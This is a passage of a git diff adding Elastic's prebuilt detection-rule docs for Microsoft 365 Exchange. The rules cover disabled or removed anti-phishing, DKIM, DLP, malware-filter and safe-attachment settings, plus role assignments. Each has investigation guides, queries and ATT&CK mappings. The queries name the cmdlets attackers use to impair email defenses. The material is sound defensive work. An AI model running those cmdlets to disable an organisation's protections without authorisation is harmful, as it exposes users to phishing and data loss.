unauthorized access is confirmed. + + +*False positive analysis* + + +- Administrative changes: Legitimate administrative tasks may involve modifying or disabling anti-phishing rules for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Security audits: Regular security audits might require temporary adjustments to anti-phishing rules. Document these activities and exclude them from alerts by correlating with audit logs. +- Third-party integrations: Some third-party security tools may interact with Microsoft 365 settings, triggering rule modifications. Identify these tools and exclude their actions from triggering alerts by using their specific identifiers. +- Policy updates: Organizational policy changes might necessitate updates to anti-phishing rules. Ensure these changes are documented and exclude them from alerts by associating them with approved change management processes. + + +*Response and remediation* + + +- Immediately isolate the affected user accounts to prevent further unauthorized access and potential spread of phishing attacks. +- Revert any unauthorized changes to the anti-phishing rules by restoring them to their previous configurations using backup or documented settings. +- Conduct a thorough review of recent email logs and user activity to identify any potential phishing emails that may have bypassed the modified rules and take steps to quarantine or delete them. +- Notify the security team and relevant stakeholders about the incident, providing details of the rule modification and any identified phishing attempts. +- Escalate the incident to the incident response team for further investigation and to determine if additional systems or data have been compromised. +- Implement enhanced monitoring and alerting for any further attempts to modify anti-phishing rules, ensuring that similar activities are detected promptly. +- Review and update access controls and permissions for administrative actions within Microsoft 365 to ensure that only authorized personnel can modify security settings. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Remove-AntiPhishRule" or "Disable-AntiPhishRule") and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc new file mode 100644 index 0000000000..5cce3893e1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled]] +=== Microsoft 365 Exchange DKIM Signing Configuration Disabled + +Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange DKIM Signing Configuration Disabled* + + +DomainKeys Identified Mail (DKIM) is a security protocol that ensures email authenticity by allowing recipients to verify that messages are sent from authorized servers. Disabling DKIM can expose organizations to email spoofing, where attackers impersonate legitimate domains to conduct phishing attacks. The detection rule identifies when DKIM is disabled in Microsoft 365, signaling potential unauthorized changes that could facilitate persistent threats. + + +*Possible investigation steps* + + +- Review the audit logs in Microsoft 365 to identify the user or service account associated with the event.action "Set-DkimSigningConfig" where o365.audit.Parameters.Enabled is False. This will help determine who or what initiated the change. +- Check the event.timestamp to establish when the DKIM signing configuration was disabled and correlate this with any other suspicious activities or changes in the environment around the same time. +- Investigate the event.outcome field to confirm that the action was successful and not a failed attempt, which could indicate a misconfiguration or unauthorized access attempt. +- Examine the event.provider and event.category fields to ensure that the event is specifically related to Exchange and web actions, confirming the context of the alert. +- Assess the risk score and severity level to prioritize the investigation and determine if immediate action is required to mitigate potential threats. +- Look into any recent changes in administrative roles or permissions that could have allowed unauthorized users to disable DKIM signing, focusing on persistence tactics as indicated by the MITRE ATT&CK framework reference. + + +*False positive analysis* + + +- Routine administrative changes: Sometimes, DKIM signing configurations may be disabled temporarily during routine maintenance or updates by authorized IT personnel. To manage this, establish a process to document and approve such changes, and create exceptions in the monitoring system for these documented events. +- Testing and troubleshooting: IT teams may disable DKIM as part of testing or troubleshooting email configurations. Ensure that these activities are logged and approved, and consider setting up alerts that differentiate between test environments and production environments to reduce noise. +- Configuration migrations: During migrations to new email systems or configurations, DKIM may be disabled as part of the transition process. Implement a change management protocol that includes notifying the security team of planned migrations, allowing them to temporarily adjust monitoring rules. +- Third-party integrations: Some third-party email services may require DKIM to be disabled temporarily for integration purposes. Maintain a list of approved third-party services and create exceptions for these specific cases, ensuring that the security team is aware of and has approved the integration. + + +*Response and remediation* + + +- Immediately re-enable DKIM signing for the affected domain in Microsoft 365 to restore email authenticity and prevent potential spoofing attacks. +- Conduct a review of recent administrative activities in Microsoft 365 to identify any unauthorized changes or suspicious behavior that may have led to the DKIM configuration being disabled. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized change and potential risks associated with it. +- Implement additional monitoring on the affected domain and related accounts to detect any further unauthorized changes or suspicious activities. +- Review and update access controls and permissions for administrative accounts in Microsoft 365 to ensure that only authorized personnel can modify DKIM settings. +- Escalate the incident to the organization's incident response team for further investigation and to determine if any additional security measures are necessary. +- Consider implementing additional email security measures, such as SPF and DMARC, to complement DKIM and enhance overall email security posture. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Set-DkimSigningConfig" and o365.audit.Parameters.Enabled:False and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc new file mode 100644 index 0000000000..6d36c0086f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed]] +=== Microsoft 365 Exchange DLP Policy Removed + +Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange DLP Policy Removed* + + +Data Loss Prevention (DLP) in Microsoft 365 Exchange is crucial for safeguarding sensitive information by monitoring and controlling data transfers. Adversaries may exploit this by removing DLP policies to bypass data monitoring, facilitating unauthorized data exfiltration. The detection rule identifies such actions by analyzing audit logs for specific events indicating successful DLP policy removal, thus alerting security teams to potential defense evasion tactics. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Remove-DlpPolicy" to identify the user account responsible for the action. +- Check the event.outcome field to confirm the success of the DLP policy removal and gather additional context from related logs. +- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies. +- Verify if the removed DLP policy was critical for protecting sensitive data and assess the potential impact of its removal. +- Contact the user or their manager to confirm if the DLP policy removal was authorized and legitimate. +- Examine any recent changes in permissions or roles for the user account to determine if they had the necessary privileges to remove the DLP policy. + + +*False positive analysis* + + +- Routine administrative changes to DLP policies by authorized personnel can trigger alerts. To manage this, maintain a list of authorized users and correlate their activities with policy changes to verify legitimacy. +- Scheduled updates or maintenance activities might involve temporary removal of DLP policies. Document these activities and create exceptions in the monitoring system for the duration of the maintenance window. +- Automated scripts or third-party tools used for policy management can inadvertently trigger false positives. Ensure these tools are properly documented and their actions are logged to differentiate between legitimate and suspicious activities. +- Changes in organizational policy or compliance requirements may necessitate the removal of certain DLP policies. Keep a record of such changes and adjust the monitoring rules to accommodate these legitimate actions. + + +*Response and remediation* + + +- Immediately isolate the affected Microsoft 365 account to prevent further unauthorized actions and data exfiltration. +- Review the audit logs to identify any additional unauthorized changes or suspicious activities associated with the account or related accounts. +- Restore the removed DLP policy from a backup or recreate it based on the organization's standard configuration to re-enable data monitoring. +- Conduct a thorough investigation to determine the scope of data exposure and identify any data that may have been exfiltrated during the period the DLP policy was inactive. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional containment measures are necessary. +- Implement enhanced monitoring and alerting for similar events, focusing on unauthorized changes to security policies and configurations. +- Review and strengthen access controls and permissions for accounts with the ability to modify DLP policies to prevent unauthorized changes in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Remove-DlpPolicy" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc new file mode 100644 index 0000000000..9e9ce4f5f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion]] +=== Microsoft 365 Exchange Malware Filter Policy Deletion + +Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Malware Filter Policy Deletion* + + +Microsoft 365 Exchange uses malware filter policies to detect and alert administrators about malware in emails, crucial for maintaining security. Adversaries may delete these policies to bypass detection, facilitating undetected malware distribution. The detection rule monitors audit logs for successful deletions of these policies, signaling potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Remove-MalwareFilterPolicy" to identify the user account responsible for the deletion. +- Investigate the event.outcome to confirm the success of the policy deletion and gather additional context from related logs. +- Check the event.provider "Exchange" and event.category "web" to ensure the activity is consistent with expected administrative actions. +- Assess the recent activity of the identified user account for any unusual behavior or signs of compromise, such as unexpected login locations or times. +- Examine other security alerts or incidents involving the same user account or related systems to identify potential patterns or coordinated attacks. +- Verify if there are any recent changes in permissions or roles for the user account that could explain the ability to delete the malware filter policy. +- Coordinate with IT and security teams to determine if the deletion was authorized or if immediate remediation actions are necessary to restore security controls. + + +*False positive analysis* + + +- Administrative maintenance activities may trigger the rule if administrators are legitimately updating or removing outdated malware filter policies. To manage this, maintain a log of scheduled maintenance activities and cross-reference with alerts to verify legitimacy. +- Automated scripts or third-party tools used for policy management might inadvertently delete policies, leading to false positives. Ensure these tools are configured correctly and consider excluding their actions from the rule if they are verified as non-threatening. +- Changes in organizational policy or security strategy might necessitate the removal of certain malware filter policies. Document these changes and create exceptions in the detection rule for these specific actions to prevent unnecessary alerts. +- User error during policy management could result in accidental deletions. Implement additional verification steps or approval processes for policy deletions to reduce the likelihood of such errors triggering false positives. + + +*Response and remediation* + + +- Immediately isolate the affected account or system to prevent further unauthorized actions or malware distribution. +- Recreate the deleted malware filter policy to restore the email security posture and prevent further evasion attempts. +- Conduct a thorough review of recent audit logs to identify any other suspicious activities or policy changes that may indicate a broader compromise. +- Reset passwords and enforce multi-factor authentication for the affected account to secure access and prevent further unauthorized actions. +- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals a larger threat. +- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities or attempts to bypass security measures. +- Review and update security policies and configurations to ensure they are robust against similar evasion tactics in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Remove-MalwareFilterPolicy" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc new file mode 100644 index 0000000000..7491f45897 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification]] +=== Microsoft 365 Exchange Malware Filter Rule Modification + +Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Malware Filter Rule Modification* + + +Microsoft 365 Exchange uses malware filter rules to protect email systems by identifying and blocking malicious content. Adversaries may attempt to disable or remove these rules to bypass security measures and facilitate attacks. The detection rule monitors audit logs for successful actions that alter these rules, signaling potential defense evasion tactics. This helps security analysts quickly identify and respond to unauthorized modifications. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the rule modification. +- Identify the user account associated with the event.action:("Remove-MalwareFilterRule" or "Disable-MalwareFilterRule") and verify if the action was authorized or expected. +- Check the event.category:web logs for any related activities around the same timeframe to identify potential patterns or additional suspicious actions. +- Investigate the event.outcome:success to ensure that the modification was indeed successful and assess the impact on the organization's security posture. +- Correlate the identified actions with any recent security incidents or alerts to determine if this modification is part of a larger attack or threat campaign. +- Review the user's recent activity and access logs to identify any other unusual or unauthorized actions that may indicate compromised credentials or insider threat behavior. + + +*False positive analysis* + + +- Routine administrative changes to malware filter rules by authorized IT personnel can trigger alerts. To manage this, maintain a list of authorized users and their expected activities, and create exceptions for these users in the monitoring system. +- Scheduled maintenance or updates to Microsoft 365 configurations might involve temporary disabling of certain rules. Document these activities and adjust the monitoring system to recognize these as non-threatening. +- Automated scripts or third-party tools used for system management may perform actions that resemble rule modifications. Ensure these tools are properly documented and their actions are whitelisted if verified as safe. +- Changes made during incident response or troubleshooting can appear as rule modifications. Coordinate with the incident response team to log these activities and exclude them from triggering alerts. + + +*Response and remediation* + + +- Immediately isolate the affected user accounts and systems to prevent further unauthorized modifications to the malware filter rules. +- Re-enable or recreate the disabled or removed malware filter rules to restore the intended security posture of the Microsoft 365 environment. +- Conduct a thorough review of recent email traffic and logs to identify any potential malicious content that may have bypassed the filters during the period of rule modification. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or accounts have been compromised. +- Implement enhanced monitoring and alerting for any future attempts to modify malware filter rules, ensuring rapid detection and response. +- Review and update access controls and permissions for administrative actions within Microsoft 365 to limit the ability to modify security configurations to only essential personnel. +- Document the incident, including actions taken and lessons learned, to improve future response efforts and update incident response plans accordingly. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Remove-MalwareFilterRule" or "Disable-MalwareFilterRule") and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc new file mode 100644 index 0000000000..59994791db --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment]] +=== Microsoft 365 Exchange Management Group Role Assignment + +Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Management Group Role Assignment* + + +Microsoft 365 Exchange Management roles define permissions for managing Exchange environments. Adversaries may exploit this by assigning roles to unauthorized users, ensuring persistent access. The detection rule monitors successful role assignments within Exchange, flagging potential unauthorized changes that align with persistence tactics, thus aiding in identifying and mitigating unauthorized access attempts. + + +*Possible investigation steps* + + +- Review the event details to confirm the event.action is "New-ManagementRoleAssignment" and the event.outcome is "success" to ensure the alert is valid. +- Identify the user account associated with the role assignment by examining the event.dataset and event.provider fields, and verify if the account is authorized to make such changes. +- Check the history of role assignments for the identified user to determine if there are any patterns of unauthorized or suspicious activity. +- Investigate the specific management role that was assigned to understand its permissions and potential impact on the environment. +- Correlate this event with other recent activities from the same user or IP address to identify any additional suspicious behavior or anomalies. +- Consult with the relevant IT or security teams to verify if the role assignment was part of a legitimate administrative task or change request. + + +*False positive analysis* + + +- Routine administrative role assignments can trigger alerts. Regularly review and document legitimate role changes to differentiate them from unauthorized activities. +- Automated scripts or tools used for role management may cause false positives. Identify and whitelist these tools to prevent unnecessary alerts. +- Changes made during scheduled maintenance windows might be flagged. Establish a process to temporarily suppress alerts during these periods while ensuring post-maintenance reviews. +- Role assignments related to onboarding or offboarding processes can appear suspicious. Implement a verification step to confirm these changes align with HR records and expected activities. +- Frequent role changes by specific users with administrative privileges may not indicate malicious intent. Monitor these users' activities and establish a baseline to identify deviations from normal behavior. + + +*Response and remediation* + + +- Immediately revoke the newly assigned management role from the unauthorized user to prevent further unauthorized access or changes. +- Conduct a thorough review of recent activity logs for the affected account to identify any suspicious actions taken since the role assignment. +- Reset the credentials of the compromised account and enforce multi-factor authentication to enhance security. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement additional monitoring on the affected account and similar high-privilege accounts to detect any further unauthorized attempts. +- Review and update access control policies to ensure that only authorized personnel can assign management roles in Microsoft 365. +- Consider conducting a security awareness session for administrators to reinforce the importance of monitoring and managing role assignments securely. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"New-ManagementRoleAssignment" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc new file mode 100644 index 0000000000..42b36a8fbd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled]] +=== Microsoft 365 Exchange Safe Attachment Rule Disabled + +Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Safe Attachment Rule Disabled* + + +Microsoft 365's Safe Attachment feature enhances security by analyzing email attachments in a secure environment to detect unknown malware. Disabling this rule can expose organizations to threats by allowing potentially harmful attachments to bypass scrutiny. Adversaries may exploit this to exfiltrate data or avoid detection. The detection rule monitors audit logs for successful attempts to disable this feature, signaling potential defense evasion activities. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Disable-SafeAttachmentRule" to identify the user or account responsible for the action. +- Check the event.outcome field to confirm the success of the rule being disabled and gather additional context from related logs around the same timestamp. +- Investigate the event.provider "Exchange" to determine if there are any other recent suspicious activities or changes made by the same user or account. +- Assess the event.category "web" to understand if there were any web-based interactions or anomalies that coincide with the disabling of the safe attachment rule. +- Evaluate the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats. +- Cross-reference the identified user or account with known insider threat indicators or previous security incidents to assess the likelihood of malicious intent. + + +*False positive analysis* + + +- Routine administrative changes can trigger alerts when IT staff disable Safe Attachment rules for legitimate reasons, such as testing or maintenance. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Automated scripts or third-party tools used for email management might disable Safe Attachment rules as part of their operations. Identify these tools and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses. +- Changes in organizational policy or security configurations might necessitate temporary disabling of Safe Attachment rules. Document these policy changes and adjust the monitoring rules to account for these temporary exceptions. +- Training or onboarding sessions for new IT staff might involve disabling Safe Attachment rules as part of learning exercises. Ensure these activities are logged and excluded from alerts by setting up temporary exceptions for training periods. + + +*Response and remediation* + + +- Immediately re-enable the Safe Attachment Rule in Microsoft 365 to restore the security posture and prevent further exposure to potentially harmful attachments. +- Conduct a thorough review of recent email logs and quarantine any suspicious attachments that were delivered during the period the rule was disabled. +- Isolate any systems or accounts that interacted with suspicious attachments to prevent potential malware spread or data exfiltration. +- Escalate the incident to the security operations team for further investigation and to determine if there was any unauthorized access or data compromise. +- Implement additional monitoring on the affected accounts and systems to detect any signs of ongoing or further malicious activity. +- Review and update access controls and permissions to ensure that only authorized personnel can modify security rules and configurations. +- Conduct a post-incident analysis to identify the root cause and implement measures to prevent similar incidents, such as enhancing alerting mechanisms for critical security rule changes. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Disable-SafeAttachmentRule" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc new file mode 100644 index 0000000000..1cdc4219b4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled]] +=== Microsoft 365 Exchange Safe Link Policy Disabled + +Identifies when a Safe Link policy is disabled in Microsoft 